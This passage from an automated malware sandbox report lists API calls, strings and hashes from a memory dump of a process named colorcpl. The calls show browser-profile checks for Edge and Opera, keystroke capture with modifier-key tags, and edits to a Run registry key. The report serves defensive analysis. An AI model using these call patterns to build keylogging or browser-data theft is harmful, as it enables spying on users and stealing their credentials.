                                                              • Opcode Fuzzy Hash: efd12b897d0a38b02dd8a097c5e2f4ebd1cf92bd978ed895f4dc3dac38740d97
                                                              • Instruction Fuzzy Hash: ADF0A738A4331A9FDF08FBF5DC07DFFBB6C9DA0520B000057B615AE591DE919845A6D1
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0309B5A1,?), ref: 0309B49A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                              • API String ID: 1174141254-2800177040
                                                              • Opcode ID: d1cbc2a035f8ae3e04ffd8ecd4395827c82324701fd98037bbfe7d8168b45f4c
                                                              • Instruction ID: 5c2eae8ef6f9c943179c9b4ede99ede430afee77fc1f5b768e6a300022579ed4
                                                              • Opcode Fuzzy Hash: d1cbc2a035f8ae3e04ffd8ecd4395827c82324701fd98037bbfe7d8168b45f4c
                                                              • Instruction Fuzzy Hash: BBF08238A0331A9EDF04F7F5DC16DFF7B689990510B000457A6159A181DE559846A6D1
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0309B604,?), ref: 0309B4FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                              • API String ID: 1174141254-1629609700
                                                              • Opcode ID: bdf59d1949102c499a310002227132cf39450befd38938d1d441699efac367a4
                                                              • Instruction ID: c9fc589327a4acd681c1eb3d4bd2035dc6b8dfda037fd0e6473b239edfe35caa
                                                              • Opcode Fuzzy Hash: bdf59d1949102c499a310002227132cf39450befd38938d1d441699efac367a4
                                                              • Instruction Fuzzy Hash: 62F08238A073195FDE04FBF5D806AFF7B6C9990A10B00005BE611AA181DE519946A6E0
                                                              APIs
                                                              • GetKeyState.USER32(00000011), ref: 0309A597
                                                                • Part of subcall function 03099468: GetForegroundWindow.USER32(03102008,?,03102008), ref: 0309949C
                                                                • Part of subcall function 03099468: GetWindowThreadProcessId.USER32(00000000,?), ref: 030994A7
                                                                • Part of subcall function 03099468: GetKeyboardLayout.USER32(00000000), ref: 030994AE
                                                                • Part of subcall function 03099468: GetKeyState.USER32(00000010), ref: 030994B8
                                                                • Part of subcall function 03099468: GetKeyboardState.USER32(?), ref: 030994C5
                                                                • Part of subcall function 03099468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 030994E1
                                                                • Part of subcall function 0309962E: SetEvent.KERNEL32(?,?,?,0309A77B,?,?,?,?,?,00000000), ref: 0309965A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                              • String ID: [AltL]$[AltR]
                                                              • API String ID: 3195419117-2658077756
                                                              • Opcode ID: fbb9deb96de5bb0635d5a6127706a9bd0283251634506a566287fbbc885aecb2
                                                              • Instruction ID: 5cd4f78bf207b6fdb0f666f3308ec8c28f4a281daa9fd66b33ddebe7caeafaf2
                                                              • Opcode Fuzzy Hash: fbb9deb96de5bb0635d5a6127706a9bd0283251634506a566287fbbc885aecb2
                                                              • Instruction Fuzzy Hash: 30E02B253033201BEC69B23D292A5FCB93487C2970B80004FE9824F985DD554D0063C6
                                                              APIs
                                                              • GetKeyState.USER32(00000012), ref: 0309A5F1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: State
                                                              • String ID: [CtrlL]$[CtrlR]
                                                              • API String ID: 1649606143-2446555240
                                                              • Opcode ID: b85d04628ee45c224e2b181487af7ea36324b310b7ac4826ad073282ee8f2d8e
                                                              • Instruction ID: ac398ccf568bdb45f7abb7276a4b2536df7f25edf721f7381ca479a7b6c40851
                                                              • Opcode Fuzzy Hash: b85d04628ee45c224e2b181487af7ea36324b310b7ac4826ad073282ee8f2d8e
                                                              • Instruction Fuzzy Hash: B6E07D317073111FEC14F57D651A67C7C9887C28F4F02008BEC428F886CC47850123C2
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,031021E8,80000002,80000002,0309BD02,00000000,?,03102200,pth_unenc,031021E8), ref: 030A2422
                                                              • RegDeleteValueW.ADVAPI32(031021E8,?,?,03102200,pth_unenc,031021E8), ref: 030A2436
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 030A2420
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteOpenValue
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                              • API String ID: 2654517830-1051519024
                                                              • Opcode ID: ccb04d5ab7f125434cce13edd1769a7d4bd9165da92d558bbd0c1b73319251a3
                                                              • Instruction ID: e780d242663d424ce7c382e603c0cce70cdb5bdb02e6ad20daa12ffddec9b5ee
                                                              • Opcode Fuzzy Hash: ccb04d5ab7f125434cce13edd1769a7d4bd9165da92d558bbd0c1b73319251a3
                                                              • Instruction Fuzzy Hash: B7E0C23124520CBBDF10AFB1ED07FBE7B6CDB01F01F0046A5BD0596880C7279A149660
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,03091D35), ref: 030CB4DB
                                                              • GetLastError.KERNEL32 ref: 030CB4E9
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 030CB544
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • API String ID: 1717984340-0
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 030A05F1
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 030A06BD
                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 030A06DF
                                                              • SetLastError.KERNEL32(0000007E,030A0955), ref: 030A06F6
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: ErrorLastRead
                                                              • API String ID: 4100373531-0